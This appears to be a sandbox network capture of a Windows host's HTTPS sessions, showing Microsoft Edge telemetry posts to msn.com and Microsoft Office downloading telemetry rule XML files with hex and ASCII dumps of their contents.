2024-11-10 03:55:27 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.5	49886	20.189.173.17	443	7512	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:28 UTC	1033	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1731210926755&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 5245 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=1C457A5C69C96D7328066F6F68476CEB; _EDGE_S=F=1&SID=04348CE3E2B16FF0131799D0E3856EA1; _EDGE_V=1; msnup=
2024-11-10 03:55:28 UTC	5245	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 31 2d 31 30 54 30 33 3a 35 35 3a 32 36 2e 37 35 34 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 34 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 66 39 38 30 65 34 37 35 2d 63 32 63 32 2d 34 63 31 63 2d 38 36 61 61 2d 30 38 30 38 32 61 34 36 65 62 33 35 22 2c 22 65 70 6f 63 68 22 3a 22 31 35 37 31 32 38 30 32 30 32 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-11-10T03:55:26.754Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"f980e475-c2c2-4c1c-86aa-08082a46eb35","epoch":"1571280202"},"app":{"locale
2024-11-10 03:55:28 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=d517f39566aa4681a7ab681f4c0afdf7&HASH=d517&LV=202411&V=4&LU=1731210928435; Domain=.microsoft.com; Expires=Mon, 10 Nov 2025 03:55:28 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=3058b41245ad4795a7c21fcb0409bba0; Domain=.microsoft.com; Expires=Sun, 10 Nov 2024 04:25:28 GMT; Path=/;Secure; SameSite=None time-delta-millis: 1680 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Sun, 10 Nov 2024 03:55:27 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
102	192.168.2.5	49888	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:28 UTC	192	OUT	GET /rules/rule120656v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:28 UTC	491	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:28 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT ETag: "0x8DC582BA48B5BDD" x-ms-request-id: 6538f966-101e-00a2-58f1-2c9f2e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035528Z-16547b76f7fkj7j4hC1DFW0a9g0000000c50000000003u0e x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:28 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
103	192.168.2.5	49887	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:28 UTC	192	OUT	GET /rules/rule120655v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:28 UTC	491	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:28 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT ETag: "0x8DC582BB7F164C3" x-ms-request-id: cd5b73c9-701e-0098-1e09-2d395f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035528Z-16547b76f7fknvdnhC1DFWxnys0000000c0g00000000r1pa x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-10 03:55:28 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
104	192.168.2.5	49891	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:28 UTC	192	OUT	GET /rules/rule120658v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:28 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:28 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT ETag: "0x8DC582BB650C2EC" x-ms-request-id: 48aae562-701e-0098-1d5a-32395f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035528Z-17df447cdb57srlrhC1DFWwgas00000008p0000000008ysb x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:28 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
105	192.168.2.5	49892	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:28 UTC	192	OUT	GET /rules/rule120659v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:28 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:28 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3EAF226" x-ms-request-id: d1285daf-701e-006f-2262-32afc4000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035528Z-17df447cdb5zfhrmhC1DFWh33000000008eg0000000015mk x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:28 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.5	49890	20.189.173.17	443	7512	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:28 UTC	1033	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1731210927050&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 9961 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=1C457A5C69C96D7328066F6F68476CEB; _EDGE_S=F=1&SID=04348CE3E2B16FF0131799D0E3856EA1; _EDGE_V=1; msnup=
2024-11-10 03:55:28 UTC	9961	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 31 2d 31 30 54 30 33 3a 35 35 3a 32 37 2e 30 34 39 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 35 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 66 39 38 30 65 34 37 35 2d 63 32 63 32 2d 34 63 31 63 2d 38 36 61 61 2d 30 38 30 38 32 61 34 36 65 62 33 35 22 2c 22 65 70 6f 63 68 22 3a 22 31 35 37 31 32 38 30 32 30 32 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 Data Ascii: {"name":"MS.News.Web.ContentView","time":"2024-11-10T03:55:27.049Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"f980e475-c2c2-4c1c-86aa-08082a46eb35","epoch":"1571280202"},"app":{"loc
2024-11-10 03:55:29 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=8d239384c2d64dc88c472629a7d0bccc&HASH=8d23&LV=202411&V=4&LU=1731210929069; Domain=.microsoft.com; Expires=Mon, 10 Nov 2025 03:55:29 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=3e4369cee28c408b8b5831861c266fbd; Domain=.microsoft.com; Expires=Sun, 10 Nov 2024 04:25:29 GMT; Path=/;Secure; SameSite=None time-delta-millis: 2019 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Sun, 10 Nov 2024 03:55:28 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
107	192.168.2.5	49894	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:29 UTC	192	OUT	GET /rules/rule120661v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:29 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:29 GMT Content-Type: text/xml Content-Length: 411 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B989AF051" x-ms-request-id: 1948a86d-a01e-003d-79ad-3198d7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035529Z-15869dbbcc6lq2lzhC1DFWym6c000000077000000000hk4f x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:29 UTC	411	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
108	192.168.2.5	49893	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:29 UTC	192	OUT	GET /rules/rule120660v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:29 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:29 GMT Content-Type: text/xml Content-Length: 485 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT ETag: "0x8DC582BB9769355" x-ms-request-id: 9ba15ece-101e-0034-5d08-2c96ff000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035529Z-16547b76f7fxdzxghC1DFWmf7n0000000c3g00000000ppqq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:29 UTC	485	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
109	192.168.2.5	49895	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:29 UTC	192	OUT	GET /rules/rule120662v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:29 UTC	491	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:29 GMT Content-Type: text/xml Content-Length: 470 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT ETag: "0x8DC582BBB181F65" x-ms-request-id: 52d88e03-c01e-007a-7b0b-2db877000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035529Z-16547b76f7fr28cchC1DFWnuws0000000c3g00000000kz69 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-10 03:55:29 UTC	470	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
110	192.168.2.5	49896	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:29 UTC	192	OUT	GET /rules/rule120663v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:29 UTC	491	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:29 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT ETag: "0x8DC582BB556A907" x-ms-request-id: d55876ee-301e-0099-5603-2d6683000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035529Z-16547b76f7flf9g6hC1DFWmcx800000002pg000000007yvs x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:29 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> 